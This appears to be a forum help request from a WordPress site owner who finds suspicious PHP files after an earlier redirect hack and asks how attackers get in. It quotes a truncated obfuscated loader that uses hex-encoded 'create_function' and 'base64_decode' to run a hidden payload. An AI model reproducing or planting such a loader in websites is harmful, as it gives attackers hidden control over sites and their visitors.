Around November time I had 11 or so sites hacked and everything you clicked on them in Google you were redirected elsewhere. I took all the sites down and started from scratch.
I've just logged into my hosting through Filezilla and noticed a number of bizarre file names:
There is one of these weird filenames in each of my wordpress installations and they are outside the content, admin and includes folders. I've just scanned my site for malware and it came back ok so I'm not sure what they are?
I opened them up and the content looks something like this:
<?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x 63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36 \x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7 b("",$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ 7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7M jUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7MjAyOzIwODsyMDI7MjI xOzIyMTsxOTI7MjIxOzE3NTsyNDM7MTc1OzIwMjsyMDg7MjE2O zIwNjsyMjE7MTkzOzE5ODsxOTM7MjAwOzE3NTsyNDM7MTc1OzI wMjsyMDg7MjIzOzIwNjsyMjE7MjIwOzIwMjsxNjY7MTgwOzEzM DsxMzM7MjMwOzIyNTsyMzA7MjA4OzI1MjsyMzQ7MjUxOzE2Nzs xNjg7MjM1 .............. but a lot longer...........);?>
I even have a HTML site with one of these PHP files in it so I'm 99.9% sure it's an attempt at hacking.
Since getting hacked last time I changed my passwords, then have used WP Secure and Security Scan. My tables prefixes are different and I've also uploaded htaccess files to the wp-admin folders.
Plus I make sure to update all my sites are up to date with the latest version of Wordpress.
The sites seem to be performing ok and the malaware scan came back negative so I'm thinking someone may have unsuccessfully tried to hack my sites (again). I want to delete these files.
Has anyone any idea how someone might be accessing my sites? Is it through my hosting account or my FTP software? I even improved the security on my machine to scan for malware...
I'd like to tighten this up further because I don't want these rogue PHP files on my sites at all.